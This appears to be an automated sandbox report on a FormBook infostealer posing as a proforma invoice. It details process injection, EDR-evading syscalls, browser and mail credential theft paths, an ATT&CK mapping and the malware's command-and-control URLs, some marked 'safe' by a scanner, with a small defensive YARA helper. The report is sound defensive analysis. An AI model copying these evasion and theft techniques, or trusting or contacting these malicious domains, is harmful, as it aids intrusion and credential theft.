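def find_peb_reads(blob: bytes, base: int = 0) -> list:
    """Every fs:[30h] read in blob as {"offset", "va", "reg", "len"}; `base` is the
    address the dump was taken from, so "va" lines up with the report's addresses."""
    hits = []
    for m in PEB_READ.finditer(blob):
        modrm = m.group(1)                      # None for the A1 (eax-only) form
        reg = "eax" if modrm is None else REGS[(modrm[0] >> 3) & 7]
        hits.append({"offset": m.start(), "va": base + m.start(),
                     "reg": reg, "len": m.end() - m.start()})
    return hits


def summarize(hits) -> dict:
    """Reads per register: the per-function attribution the report makes."""
    return dict(Counter(h["reg"] for h in hits))


def yara_rule(name: str = "x86_peb_pointer_reads", threshold: int = 20) -> str:
    """Equivalent YARA rule; `( .. | .. )` alternatives are YARA hex-string syntax.
    The count threshold is an assumption: legitimate CRT/loader code reads the PEB too."""
    return "\n".join([
        f"rule {name}",
        "{",
        "    strings:",
        "        $peb_eax = { 64 A1 30 00 00 00 }",
        "        $peb_r32 = { 64 8B (05|0D|15|1D|35|3D) 30 00 00 00 }",
        "    condition:",
        f"        #peb_eax + #peb_r32 > {threshold}",
        "}",
    ])


if __name__ == "__main__":
    # Pretend the fragment was dumped from 2_2_03336A50 in svchost.exe (address from the report).
    for h in find_peb_reads(SAMPLE, base=0x03336A50):
        print(f"{h['va']:08X} mov {h['reg']}, dword ptr fs:[00000030h]")
    print(summarize(find_peb_reads(SAMPLE)))
    print(yara_rule())
```

Run it against a dumped region (for example the 2.2.svchost.exe.400000.0.unpack dump from this report) with `base` set to the dump's load address, and compare the per-register counts with the entries above.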

                HIPS / PFW / Operating System Protection Evasion

                Source: C:\Program Files (x86)\URykIbKWWDMlJUeLUYouEVrRBahEEyKRfOYKTHZTrAMfOQpBsbPgMhnbTlcDGzMLxvFo\nfGtWoQBhJSQ.exe NtAllocateVirtualMemory: Direct from: 0x76EF48EC
                Source: C:\Program Files (x86)\URykIbKWWDMlJUeLUYouEVrRBahEEyKRfOYKTHZTrAMfOQpBsbPgMhnbTlcDGzMLxvFo\nfGtWoQBhJSQ.exe NtQueryAttributesFile: Direct from: 0x76EF2E6C
                Source: C:\Program Files (x86)\URykIbKWWDMlJUeLUYouEVrRBahEEyKRfOYKTHZTrAMfOQpBsbPgMhnbTlcDGzMLxvFo\nfGtWoQBhJSQ.exe NtQueryVolumeInformationFile: Direct from: 0x76EF2F2C
                Source: C:\Program Files (x86)\URykIbKWWDMlJUeLUYouEVrRBahEEyKRfOYKTHZTrAMfOQpBsbPgMhnbTlcDGzMLxvFo\nfGtWoQBhJSQ.exe NtQuerySystemInformation: Direct from: 0x76EF48CC
                Source: C:\Program Files (x86)\URykIbKWWDMlJUeLUYouEVrRBahEEyKRfOYKTHZTrAMfOQpBsbPgMhnbTlcDGzMLxvFo\nfGtWoQBhJSQ.exe NtOpenSection: Direct from: 0x76EF2E0C
                Source: C:\Program Files (x86)\URykIbKWWDMlJUeLUYouEVrRBahEEyKRfOYKTHZTrAMfOQpBsbPgMhnbTlcDGzMLxvFo\nfGtWoQBhJSQ.exe NtDeviceIoControlFile: Direct from: 0x76EF2AEC
                Source: C:\Program Files (x86)\URykIbKWWDMlJUeLUYouEVrRBahEEyKRfOYKTHZTrAMfOQpBsbPgMhnbTlcDGzMLxvFo\nfGtWoQBhJSQ.exe NtAllocateVirtualMemory: Direct from: 0x76EF2BEC
                Source: C:\Program Files (x86)\URykIbKWWDMlJUeLUYouEVrRBahEEyKRfOYKTHZTrAMfOQpBsbPgMhnbTlcDGzMLxvFo\nfGtWoQBhJSQ.exe NtQueryInformationToken: Direct from: 0x76EF2CAC
                Source: C:\Program Files (x86)\URykIbKWWDMlJUeLUYouEVrRBahEEyKRfOYKTHZTrAMfOQpBsbPgMhnbTlcDGzMLxvFo\nfGtWoQBhJSQ.exe NtCreateFile: Direct from: 0x76EF2FEC
                Source: C:\Program Files (x86)\URykIbKWWDMlJUeLUYouEVrRBahEEyKRfOYKTHZTrAMfOQpBsbPgMhnbTlcDGzMLxvFo\nfGtWoQBhJSQ.exe NtOpenFile: Direct from: 0x76EF2DCC
                Source: C:\Program Files (x86)\URykIbKWWDMlJUeLUYouEVrRBahEEyKRfOYKTHZTrAMfOQpBsbPgMhnbTlcDGzMLxvFo\nfGtWoQBhJSQ.exe NtTerminateThread: Direct from: 0x76EF2FCC
                Source: C:\Program Files (x86)\URykIbKWWDMlJUeLUYouEVrRBahEEyKRfOYKTHZTrAMfOQpBsbPgMhnbTlcDGzMLxvFo\nfGtWoQBhJSQ.exe NtOpenKeyEx: Direct from: 0x76EF2B9C
                Source: C:\Program Files (x86)\URykIbKWWDMlJUeLUYouEVrRBahEEyKRfOYKTHZTrAMfOQpBsbPgMhnbTlcDGzMLxvFo\nfGtWoQBhJSQ.exe NtSetInformationProcess: Direct from: 0x76EF2C5C
                Source: C:\Program Files (x86)\URykIbKWWDMlJUeLUYouEVrRBahEEyKRfOYKTHZTrAMfOQpBsbPgMhnbTlcDGzMLxvFo\nfGtWoQBhJSQ.exe NtProtectVirtualMemory: Direct from: 0x76EF2F9C
                Source: C:\Program Files (x86)\URykIbKWWDMlJUeLUYouEVrRBahEEyKRfOYKTHZTrAMfOQpBsbPgMhnbTlcDGzMLxvFo\nfGtWoQBhJSQ.exe NtWriteVirtualMemory: Direct from: 0x76EF2E3C
                Source: C:\Program Files (x86)\URykIbKWWDMlJUeLUYouEVrRBahEEyKRfOYKTHZTrAMfOQpBsbPgMhnbTlcDGzMLxvFo\nfGtWoQBhJSQ.exe NtNotifyChangeKey: Direct from: 0x76EF3C2C
                Source: C:\Program Files (x86)\URykIbKWWDMlJUeLUYouEVrRBahEEyKRfOYKTHZTrAMfOQpBsbPgMhnbTlcDGzMLxvFo\nfGtWoQBhJSQ.exe NtCreateMutant: Direct from: 0x76EF35CC
                Source: C:\Program Files (x86)\URykIbKWWDMlJUeLUYouEVrRBahEEyKRfOYKTHZTrAMfOQpBsbPgMhnbTlcDGzMLxvFo\nfGtWoQBhJSQ.exe NtResumeThread: Direct from: 0x76EF36AC
                Source: C:\Program Files (x86)\URykIbKWWDMlJUeLUYouEVrRBahEEyKRfOYKTHZTrAMfOQpBsbPgMhnbTlcDGzMLxvFo\nfGtWoQBhJSQ.exe NtMapViewOfSection: Direct from: 0x76EF2D1C
                Source: C:\Program Files (x86)\URykIbKWWDMlJUeLUYouEVrRBahEEyKRfOYKTHZTrAMfOQpBsbPgMhnbTlcDGzMLxvFo\nfGtWoQBhJSQ.exe NtProtectVirtualMemory: Direct from: 0x76EE7B2E
                Source: C:\Program Files (x86)\URykIbKWWDMlJUeLUYouEVrRBahEEyKRfOYKTHZTrAMfOQpBsbPgMhnbTlcDGzMLxvFo\nfGtWoQBhJSQ.exe NtAllocateVirtualMemory: Direct from: 0x76EF2BFC
                Source: C:\Program Files (x86)\URykIbKWWDMlJUeLUYouEVrRBahEEyKRfOYKTHZTrAMfOQpBsbPgMhnbTlcDGzMLxvFo\nfGtWoQBhJSQ.exe NtQuerySystemInformation: Direct from: 0x76EF2DFC
                Source: C:\Program Files (x86)\URykIbKWWDMlJUeLUYouEVrRBahEEyKRfOYKTHZTrAMfOQpBsbPgMhnbTlcDGzMLxvFo\nfGtWoQBhJSQ.exe NtReadFile: Direct from: 0x76EF2ADC
                Source: C:\Program Files (x86)\URykIbKWWDMlJUeLUYouEVrRBahEEyKRfOYKTHZTrAMfOQpBsbPgMhnbTlcDGzMLxvFo\nfGtWoQBhJSQ.exe NtDelayExecution: Direct from: 0x76EF2DDC
                Source: C:\Program Files (x86)\URykIbKWWDMlJUeLUYouEVrRBahEEyKRfOYKTHZTrAMfOQpBsbPgMhnbTlcDGzMLxvFo\nfGtWoQBhJSQ.exe NtQueryInformationProcess: Direct from: 0x76EF2C26
                Source: C:\Program Files (x86)\URykIbKWWDMlJUeLUYouEVrRBahEEyKRfOYKTHZTrAMfOQpBsbPgMhnbTlcDGzMLxvFo\nfGtWoQBhJSQ.exe NtResumeThread: Direct from: 0x76EF2FBC
                Source: C:\Program Files (x86)\URykIbKWWDMlJUeLUYouEVrRBahEEyKRfOYKTHZTrAMfOQpBsbPgMhnbTlcDGzMLxvFo\nfGtWoQBhJSQ.exe NtCreateUserProcess: Direct from: 0x76EF371C
                Source: C:\Program Files (x86)\URykIbKWWDMlJUeLUYouEVrRBahEEyKRfOYKTHZTrAMfOQpBsbPgMhnbTlcDGzMLxvFo\nfGtWoQBhJSQ.exe NtAllocateVirtualMemory: Direct from: 0x76EF3C9C
                Source: C:\Program Files (x86)\URykIbKWWDMlJUeLUYouEVrRBahEEyKRfOYKTHZTrAMfOQpBsbPgMhnbTlcDGzMLxvFo\nfGtWoQBhJSQ.exe NtWriteVirtualMemory: Direct from: 0x76EF490C
                Source: C:\Program Files (x86)\URykIbKWWDMlJUeLUYouEVrRBahEEyKRfOYKTHZTrAMfOQpBsbPgMhnbTlcDGzMLxvFo\nfGtWoQBhJSQ.exe NtSetInformationThread: Direct from: 0x76EE63F9
                Source: C:\Program Files (x86)\URykIbKWWDMlJUeLUYouEVrRBahEEyKRfOYKTHZTrAMfOQpBsbPgMhnbTlcDGzMLxvFo\nfGtWoQBhJSQ.exe NtClose: Direct from: 0x76EF2B6C
                Source: C:\Program Files (x86)\URykIbKWWDMlJUeLUYouEVrRBahEEyKRfOYKTHZTrAMfOQpBsbPgMhnbTlcDGzMLxvFo\nfGtWoQBhJSQ.exe NtSetInformationThread: Direct from: 0x76EF2B4C
                Source: C:\Program Files (x86)\URykIbKWWDMlJUeLUYouEVrRBahEEyKRfOYKTHZTrAMfOQpBsbPgMhnbTlcDGzMLxvFo\nfGtWoQBhJSQ.exe NtReadVirtualMemory: Direct from: 0x76EF2E8C
                Source: C:\Program Files (x86)\URykIbKWWDMlJUeLUYouEVrRBahEEyKRfOYKTHZTrAMfOQpBsbPgMhnbTlcDGzMLxvFo\nfGtWoQBhJSQ.exe NtCreateKey: Direct from: 0x76EF2C6C
                Source: C:\Users\user\Desktop\Proforma invoice - Arancia NZ.exe Section loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and write
                Source: C:\Windows\SysWOW64\svchost.exe Section loaded: NULL target: C:\Program Files (x86)\URykIbKWWDMlJUeLUYouEVrRBahEEyKRfOYKTHZTrAMfOQpBsbPgMhnbTlcDGzMLxvFo\nfGtWoQBhJSQ.exe protection: execute and read and write
                Source: C:\Windows\SysWOW64\svchost.exe Section loaded: NULL target: C:\Windows\SysWOW64\waitfor.exe protection: execute and read and write
                Source: C:\Windows\SysWOW64\waitfor.exe Section loaded: NULL target: C:\Program Files (x86)\URykIbKWWDMlJUeLUYouEVrRBahEEyKRfOYKTHZTrAMfOQpBsbPgMhnbTlcDGzMLxvFo\nfGtWoQBhJSQ.exe protection: read write
                Source: C:\Windows\SysWOW64\waitfor.exe Section loaded: NULL target: C:\Program Files (x86)\URykIbKWWDMlJUeLUYouEVrRBahEEyKRfOYKTHZTrAMfOQpBsbPgMhnbTlcDGzMLxvFo\nfGtWoQBhJSQ.exe protection: execute and read and write
                Source: C:\Windows\SysWOW64\waitfor.exe Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read write
                Source: C:\Windows\SysWOW64\waitfor.exe Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and write
                Source: C:\Windows\SysWOW64\waitfor.exe Thread register set: target process: 5748
                Source: C:\Windows\SysWOW64\waitfor.exe Thread APC queued: target process: C:\Program Files (x86)\URykIbKWWDMlJUeLUYouEVrRBahEEyKRfOYKTHZTrAMfOQpBsbPgMhnbTlcDGzMLxvFo\nfGtWoQBhJSQ.exe
                Source: C:\Users\user\Desktop\Proforma invoice - Arancia NZ.exe Memory written: C:\Windows\SysWOW64\svchost.exe base: 2982008
                Source: C:\Users\user\Desktop\Proforma invoice - Arancia NZ.exe Code function: 0_2_002A87B1 LogonUserW
                Source: C:\Users\user\Desktop\Proforma invoice - Arancia NZ.exe Code function: 0_2_00253B3A GetCurrentDirectoryW, IsDebuggerPresent, GetFullPathNameW, SetCurrentDirectoryW, MessageBoxA, SetCurrentDirectoryW, GetForegroundWindow, ShellExecuteW
                Source: C:\Users\user\Desktop\Proforma invoice - Arancia NZ.exe Code function: 0_2_002548D7 GetForegroundWindow, FindWindowW, IsIconic, ShowWindow, SetForegroundWindow, GetWindowThreadProcessId, GetWindowThreadProcessId, GetCurrentThreadId, GetWindowThreadProcessId, AttachThreadInput, AttachThreadInput, AttachThreadInput, AttachThreadInput, SetForegroundWindow, MapVirtualKeyW, MapVirtualKeyW, keybd_event, keybd_event, MapVirtualKeyW, keybd_event, MapVirtualKeyW, keybd_event, MapVirtualKeyW, keybd_event, SetForegroundWindow, AttachThreadInput, AttachThreadInput, AttachThreadInput, AttachThreadInput
                Source: C:\Users\user\Desktop\Proforma invoice - Arancia NZ.exe Code function: 0_2_002B4C27 mouse_event
                Source: C:\Users\user\Desktop\Proforma invoice - Arancia NZ.exe Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\Proforma invoice - Arancia NZ.exe"
                Source: C:\Program Files (x86)\URykIbKWWDMlJUeLUYouEVrRBahEEyKRfOYKTHZTrAMfOQpBsbPgMhnbTlcDGzMLxvFo\nfGtWoQBhJSQ.exe Process created: C:\Windows\SysWOW64\waitfor.exe "C:\Windows\SysWOW64\waitfor.exe"
                Source: C:\Windows\SysWOW64\waitfor.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
                Source: C:\Users\user\Desktop\Proforma invoice - Arancia NZ.exe Code function: 0_2_002A7CAF GetSecurityDescriptorDacl, _memset, GetAclInformation, GetLengthSid, GetAce, AddAce, GetLengthSid, GetProcessHeap, HeapAlloc, GetLengthSid, CopySid, AddAce, SetSecurityDescriptorDacl, SetUserObjectSecurity
                Source: C:\Users\user\Desktop\Proforma invoice - Arancia NZ.exe Code function: 0_2_002A874B AllocateAndInitializeSid, CheckTokenMembership, FreeSid
                Source: Proforma invoice - Arancia NZ.exe Binary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
                Source: nfGtWoQBhJSQ.exe, 00000004.00000002.4469049325.0000000001901000.00000002.00000001.00040000.00000000.sdmp, nfGtWoQBhJSQ.exe, 00000004.00000000.2222075365.0000000001901000.00000002.00000001.00040000.00000000.sdmp, nfGtWoQBhJSQ.exe, 00000006.00000000.2371582671.0000000000C31000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Program Manager
                Source: Proforma invoice - Arancia NZ.exe, nfGtWoQBhJSQ.exe, 00000004.00000002.4469049325.0000000001901000.00000002.00000001.00040000.00000000.sdmp, nfGtWoQBhJSQ.exe, 00000004.00000000.2222075365.0000000001901000.00000002.00000001.00040000.00000000.sdmp, nfGtWoQBhJSQ.exe, 00000006.00000000.2371582671.0000000000C31000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Shell_TrayWnd
                Source: nfGtWoQBhJSQ.exe, 00000004.00000002.4469049325.0000000001901000.00000002.00000001.00040000.00000000.sdmp, nfGtWoQBhJSQ.exe, 00000004.00000000.2222075365.0000000001901000.00000002.00000001.00040000.00000000.sdmp, nfGtWoQBhJSQ.exe, 00000006.00000000.2371582671.0000000000C31000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progman
                Source: nfGtWoQBhJSQ.exe, 00000004.00000002.4469049325.0000000001901000.00000002.00000001.00040000.00000000.sdmp, nfGtWoQBhJSQ.exe, 00000004.00000000.2222075365.0000000001901000.00000002.00000001.00040000.00000000.sdmp, nfGtWoQBhJSQ.exe, 00000006.00000000.2371582671.0000000000C31000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progmanlock
                Source: C:\Users\user\Desktop\Proforma invoice - Arancia NZ.exe Code function: 0_2_0027862B cpuid
                Source: C:\Users\user\Desktop\Proforma invoice - Arancia NZ.exe Code function: 0_2_00284E87 GetSystemTimeAsFileTime, GetCurrentThreadId, GetCurrentProcessId, QueryPerformanceCounter
                Source: C:\Users\user\Desktop\Proforma invoice - Arancia NZ.exe Code function: 0_2_00291E06 GetUserNameW
                Source: C:\Users\user\Desktop\Proforma invoice - Arancia NZ.exe Code function: 0_2_00283F3A __lock, ____lc_codepage_func, __getenv_helper_nolock, _free, _strlen, __malloc_crt, _strlen, __invoke_watson, _free, GetTimeZoneInformation, WideCharToMultiByte, WideCharToMultiByte
                Source: C:\Users\user\Desktop\Proforma invoice - Arancia NZ.exe Code function: 0_2_002549A0 GetVersionExW, GetCurrentProcess, IsWow64Process, GetNativeSystemInfo, FreeLibrary, GetSystemInfo, GetSystemInfo

                Stealing of Sensitive Information

                Source: Yara match File source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara match File source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara match File source: 00000002.00000002.2297054463.0000000003200000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match File source: 00000005.00000002.4469589553.0000000000CB0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match File source: 00000002.00000002.2296706560.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match File source: 00000005.00000002.4468208787.0000000000820000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match File source: 00000004.00000002.4469588528.0000000002FB0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match File source: 00000005.00000002.4469517194.0000000000C60000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match File source: 00000002.00000002.2298090586.0000000003A00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: C:\Windows\SysWOW64\waitfor.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
                Source: C:\Windows\SysWOW64\waitfor.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
                Source: C:\Windows\SysWOW64\waitfor.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
                Source: C:\Windows\SysWOW64\waitfor.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                Source: C:\Windows\SysWOW64\waitfor.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                Source: C:\Windows\SysWOW64\waitfor.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State
                Source: C:\Windows\SysWOW64\waitfor.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State
                Source: C:\Windows\SysWOW64\waitfor.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
                Source: C:\Windows\SysWOW64\waitfor.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\
                Source: Proforma invoice - Arancia NZ.exe Binary or memory string: WIN_81
                Source: Proforma invoice - Arancia NZ.exe Binary or memory string: WIN_XP
                Source: Proforma invoice - Arancia NZ.exe Binary or memory string: WIN_XPe
                Source: Proforma invoice - Arancia NZ.exe Binary or memory string: WIN_VISTA
                Source: Proforma invoice - Arancia NZ.exe Binary or memory string: WIN_7
                Source: Proforma invoice - Arancia NZ.exe Binary or memory string: WIN_8
                Source: Proforma invoice - Arancia NZ.exe Binary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_10WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 14, 0USERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte

Remote Access Functionality

Source: Yara match | File source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000002.00000002.2297054463.0000000003200000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000002.4469589553.0000000000CB0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.2296706560.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000002.4468208787.0000000000820000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.4469588528.0000000002FB0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000002.4469517194.0000000000C60000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.2298090586.0000000003A00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: C:\Users\user\Desktop\Proforma invoice - Arancia NZ.exe | Code function: 0_2_002C6283 socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket, | 0_2_002C6283
Source: C:\Users\user\Desktop\Proforma invoice - Arancia NZ.exe | Code function: 0_2_002C6747 socket,WSAGetLastError,bind,WSAGetLastError,closesocket, | 0_2_002C6747
MITRE ATT&CK Matrix (techniques listed per tactic; a number in parentheses is the count of matching signatures)

Reconnaissance: Gather Victim Identity Information, Credentials, Email Addresses, Employee Names, Gather Victim Network Information, Domain Properties, DNS, Network Trust Dependencies, Network Topology
Resource Development: Acquire Infrastructure, Domains, DNS Server, Virtual Private Server, Server, Botnet, Web Services, Serverless, Malvertising
Initial Access: Valid Accounts (2), Default Accounts, Domain Accounts, Local Accounts, Cloud Accounts, Replication Through Removable Media, External Remote Services, Drive-by Compromise, Exploit Public-Facing Application
Execution: Native API (2), Scheduled Task/Job, At, Cron, Launchd, Scheduled Task, Systemd Timers, Container Orchestration Job, Command and Scripting Interpreter
Persistence: DLL Side-Loading (1), Valid Accounts (2), Logon Script (Windows), Login Hook, Network Logon Script, RC Scripts, Startup Items, Scheduled Task/Job, At
Privilege Escalation: Exploitation for Privilege Escalation (1), Abuse Elevation Control Mechanism (1), DLL Side-Loading (1), Valid Accounts (2), Access Token Manipulation (21), Process Injection (412), Startup Items, Scheduled Task/Job, At
Defense Evasion: Disable or Modify Tools (1), Deobfuscate/Decode Files or Information (1), Abuse Elevation Control Mechanism (1), Obfuscated Files or Information (2), DLL Side-Loading (1), Valid Accounts (2), Virtualization/Sandbox Evasion (2), Access Token Manipulation (21), Process Injection (412)
Credential Access: OS Credential Dumping (1), Input Capture (21), Security Account Manager, NTDS, LSA Secrets, Cached Domain Credentials, DCSync, Proc Filesystem, /etc/passwd and /etc/shadow
Discovery: System Time Discovery (2), Account Discovery (1), File and Directory Discovery (2), System Information Discovery (116), Security Software Discovery (151), Virtualization/Sandbox Evasion (2), Process Discovery (3), Application Window Discovery (11), System Owner/User Discovery (1)
Lateral Movement: Remote Services, Remote Desktop Protocol, SMB/Windows Admin Shares, Distributed Component Object Model, SSH, VNC, Windows Remote Management, Cloud Services, Direct Cloud VM Connections
Collection: Archive Collected Data (1), Data from Local System (1), Email Collection (1), Input Capture (21), Clipboard Data (3), GUI Input Capture, Web Portal Capture, Credential API Hooking, Data Staged
Command and Control: Ingress Tool Transfer (5), Encrypted Channel (1), Non-Application Layer Protocol (5), Application Layer Protocol (5), Fallback Channels, Multiband Communication, Commonly Used Port, Application Layer Protocol, Web Protocols
Exfiltration: Exfiltration Over Other Network Medium, Exfiltration Over Bluetooth, Automated Exfiltration, Traffic Duplication, Scheduled Transfer, Data Transfer Size Limits, Exfiltration Over C2 Channel, Exfiltration Over Alternative Protocol, Exfiltration Over Symmetric Encrypted Non-C2 Protocol
Impact: System Shutdown/Reboot (1), Network Denial of Service, Data Encrypted for Impact, Data Destruction, Data Encrypted for Impact, Service Stop, Inhibit System Recovery, Defacement, Internal Defacement

Legend:

• Process
• Signature
• Created File
• DNS/IP Info
• Is Dropped
• Is Windows Process
• Number of created Registry Values
• Number of created Files
• Visual Basic
• Delphi
• Java
• .Net C# or VB.NET
• C, C++ or other language
• Is malicious
• Internet
Behavior Graph ID: 1566688 | Sample: Proforma invoice - Arancia NZ.exe | Startdate: 02/12/2024 | Architecture: WINDOWS | Score: 100

Behavior graph, rendered as a process tree (bracketed numbers are the node badges from the graph; see the legend above):

Start
  DNS/IP: www.optimismbank.xyz; www.jcsa.info; 16 other IPs or domains
  Signatures: Suricata IDS alerts for network traffic; Multi AV Scanner detection for submitted file; Yara detected FormBook; 5 other signatures
  www.optimismbank.xyz: Performs DNS queries to domains with low reputation
  -> started: Proforma invoice - Arancia NZ.exe [2]
     Signatures: Binary is likely a compiled AutoIt script file; Writes to foreign memory regions; Maps a DLL or memory area into another process
     -> started: svchost.exe
        Signatures: Maps a DLL or memory area into another process
        -> injected: nfGtWoQBhJSQ.exe
           Signatures: Found direct / indirect Syscall (likely to bypass EDR)
           -> started: waitfor.exe [13]
              Signatures: Tries to steal Mail credentials (via file / registry access); Tries to harvest and steal browser information (history, passwords, etc); Modifies the context of a thread in another process (thread injection); 3 other signatures
              -> injected: nfGtWoQBhJSQ.exe
                 DNS/IP: thaor56.online 202.92.5.23, ports 49751, 80, VNPT-AS-VN VNPTCorp, Viet Nam; www.bankseedz.info 46.30.211.38, ports 49899, 49905, 49914, ONECOMDK, Denmark; 11 other IPs or domains
                 Signatures: Found direct / indirect Syscall (likely to bypass EDR)
              -> started: firefox.exe

Source | Detection | Scanner | Label | Link
Proforma invoice - Arancia NZ.exe | 47% | ReversingLabs | Win32.Trojan.AutoitInject |
Proforma invoice - Arancia NZ.exe | 100% | Joe Sandbox ML | |
No Antivirus matches
No Antivirus matches
No Antivirus matches
Source | Detection | Scanner | Label | Link
http://www.Jcsa.info | 0% | Avira URL Cloud | safe |
http://www.jcsa.info/hxi5/ | 0% | Avira URL Cloud | safe |
http://www.jcsa.info/Education_Seminars.cfm?fp=lb%2BPnXhD9C%2Fd8Bxw3PrZGZ73tgTdrp1kqELRDu1yImkeHsR12 | 0% | Avira URL Cloud | safe |
http://www.greenthub.life/r3zg/ | 0% | Avira URL Cloud | safe |
http://www.madhf.tech/3iym/ | 0% | Avira URL Cloud | safe |
http://www.rgenerousrs.store/8gp4/?bV=FEeZWlhMd48ysDs290a5kdk4wKu/Usks8a8x1+EEc0Vq+hoQB7y77HQo5oow9pdvGKqyyoz5OAo+pUm014OHEU2GNEJ4iSl/EJTCwnsfNhVKTNH/IB8Mre+zSk1Y9E9ALA==&wzcP=iLdd | 0% | Avira URL Cloud | safe |
http://www.rgenerousrs.store | 0% | Avira URL Cloud | safe |
http://www.bankseedz.info/uf7y/ | 0% | Avira URL Cloud | safe |
http://www.jcsa.info/College_Information.cfm?fp=lb%2BPnXhD9C%2Fd8Bxw3PrZGZ73tgTdrp1kqELRDu1yImkeHsR1 | 0% | Avira URL Cloud | safe |
http://www.1secondlending.one/j8pv/?bV=JIuj9wxSnK6mEyWHgqme9cDOp2JPGD2avn5HAjA8ht24L6v+vQ9uqWv6ig59Dwg+VmGSo2u3Iy71OFL1070b7jwAWfgjYo1ceHXmQsmagjo2PVHkyEcMWf8OCye8gCuDoA==&wzcP=iLdd | 0% | Avira URL Cloud | safe |
http://www.bankseedz.info/uf7y/?bV=X8Xx4Xb3zOwIp/YnRuUSDS9+m9M27HztmVzPPBr+rNKRcobOh5vjSVUUxnTRN3k+HcX7svN7WZWipHk078Y7gow9os+aP1J4EzwTxXBX+A+Fa6CXCkfj46dm/6YpVTzCxw==&wzcP=iLdd | 0% | Avira URL Cloud | safe |
http://www.greenthub.life/r3zg/?bV=du4jOMLkh7fLnmDuLYOIPa2Wp2ys3F+jaV3EKcXkS3D/yxi6pio40SibWtKrR6Fw1AeDGXhTcKeneAqCGOT06b5FqqYL9BGdKsZ2rM8t/H5MOkDBuj8Escbc06JqN3wYtw==&wzcP=iLdd | 0% | Avira URL Cloud | safe |
http://www.jcsa.info/University_of_Toronto.cfm?fp=lb%2BPnXhD9C%2Fd8Bxw3PrZGZ73tgTdrp1kqELRDu1yImkeHs | 0% | Avira URL Cloud | safe |
http://www.register.com/?trkID=WSTm3u15CW | 0% | Avira URL Cloud | safe |
http://www.laohub10.net/n2c9/ | 0% | Avira URL Cloud | safe |
http://www.madhf.tech/3iym/?bV=hj5olkscFnqSpGab0vn3LNHrBnWaORens9/m32Sz6t4FBTGsttWpVpCBqSKeTRLk/faBYURW8ZeFt/JnnXLulZu44boXAwOrdyhUlC/OJ4E8YsdUb7oGGCmNRhxxg5yFhA==&wzcP=iLdd | 0% | Avira URL Cloud | safe |
http://www.jcsa.info/Education_Grant.cfm?fp=lb%2BPnXhD9C%2Fd8Bxw3PrZGZ73tgTdrp1kqELRDu1yImkeHsR12xVM | 0% | Avira URL Cloud | safe |
http://www.yc791022.asia/31pt/?bV=TMDpBYanOquY9Rx7lbKrlsthbxkcecghv73C9/MKdrwqjZcj4ORMyeLFBityLVio1oCUCVJYl2rwHayMePC/X0tkqytLQfQBhcOdFFeEx3iaXLjcxC54/kiaY/bAFrqB8g==&wzcP=iLdd | 0% | Avira URL Cloud | safe |
http://www.optimismbank.xyz/98j3/ | 0% | Avira URL Cloud | safe |
http://www.jcsa.info/display.cfm | 0% | Avira URL Cloud | safe |
